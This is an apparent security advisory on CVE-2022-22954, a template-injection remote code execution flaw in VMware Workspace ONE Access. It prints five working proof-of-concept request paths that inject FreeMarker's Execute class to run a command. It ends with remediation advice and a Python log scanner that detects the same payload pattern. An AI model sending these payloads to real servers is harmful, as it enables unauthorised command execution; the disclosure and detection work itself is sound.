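VMware Workspace ONE Access RCE (Remote Code Execution) Vulnerability CVE-2022-22954
Vulnerability Information
VMware Workspace ONE Access (formerly VMware Identity Manager) is designed to give your employees faster access to SaaS, web, and native mobile applications through multi-factor authentication, conditional access, and single sign-on.
VMware recently announced on its official website that VMware Workspace ONE Access is affected by multiple vulnerabilities:
Vulnerability Reproduction
Wuhan Mingjiaxin Security Lab (武汉明嘉信安全实验室) set up a local environment to reproduce the vulnerability.
To build the environment, download a vulnerable VMware Workspace ONE Access OVA file and import it as a virtual machine. The hostname must be set to a domain name.
The PoC used to verify the vulnerability is as follows: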
/catalog-portal/ui?code=&deviceUdid=&deviceType=%24%7B”freemarker.template.utility.Execute”%3Fnew%28%29%28″id”%29%7D
/catalog-portal/hub-ui?deviceType=&deviceUdid=%24%7B”freemarker.template.utility.Execute”%3Fnew%28%29%28″id”%29%7D
/catalog-portal/hub-ui/byob?deviceType=&deviceUdid=%24%7B”freemarker.template.utility.Execute”%3Fnew%28%29%28″id”%29%7D
/catalog-portal/ui/oauth/verify?error=&deviceType=&deviceUdid=%24%7B”freemarker.template.utility.Execute”%3Fnew%28%29%28″id”%29%7D
/catalog-portal/ui/oauth/verify?code=&deviceType=&deviceUdid=%24%7B”freemarker.template.utility.Execute”%3Fnew%28%29%28″id”%29%7D
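Sending the request with Burp confirms that the code executes successfully.
Remediation
Check your systems against the affected version range. The vendor has released a fix; follow the official advisory to remediate: https://kb.vmware.com/s/article/88099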
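To support that check, the following scans web access logs for the request pattern shown in the PoC above: FreeMarker template syntax in the deviceUdid or deviceType parameter of a /catalog-portal/ request. It is an added example, not part of the original post or VMware's tooling; the combined log format, the sample lines, and all function names are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

WATCHED_PREFIX = "/catalog-portal/"            # path prefix shared by the PoC URLs
WATCHED_PARAMS = {"deviceudid", "devicetype"}  # parameters used in the PoC URLs
# FreeMarker syntax openers plus the package named in the PoC.
MARKERS = re.compile(r"\$\{|#\{|<#|freemarker\.template", re.I)
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding so double-encoded input is not missed."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_line(line):
    """Return names of watched parameters carrying template syntax, else []."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    target = urlsplit(match.group(1))
    if not target.path.lower().startswith(WATCHED_PREFIX):
        return []
    return [name for name, value in parse_qsl(target.query, keep_blank_values=True)
            if name.lower() in WATCHED_PARAMS and MARKERS.search(fully_decode(value))]

def scan(lines):
    """Return (line_index, flagged_parameters) for every suspicious line."""
    return [(i, hits) for i, line in enumerate(lines) if (hits := inspect_line(line))]

# Constructed sample log lines (assumed combined log format; not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /catalog-portal/ui?code=&deviceUdid='
    '&deviceType=%24%7B%22freemarker.template.utility.Execute%22%3Fnew%28%29%28%22id%22%29%7D'
    ' HTTP/1.1" 400 512',
    '198.51.100.4 - - [01/Jan/2024:10:00:05 +0000] "GET /catalog-portal/hub-ui?deviceType=iOS'
    '&deviceUdid=3f2a9c HTTP/1.1" 200 2048',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /catalog-portal/hub-ui/byob?deviceType='
    '&deviceUdid=%2524%257Bx%257D HTTP/1.1" 400 512',   # double-encoded ${x}
    '198.51.100.9 - - [01/Jan/2024:10:00:12 +0000] "GET /other/app?deviceUdid=%24%7B1%7D'
    ' HTTP/1.1" 404 128',                               # outside the watched path
]

if __name__ == "__main__":
    for index, params in scan(SAMPLE_LOG):
        print(f"line {index}: template syntax in {', '.join(params)}")
```

A hit shows only that such a request reached the server; patch status still has to be confirmed against the vendor advisory.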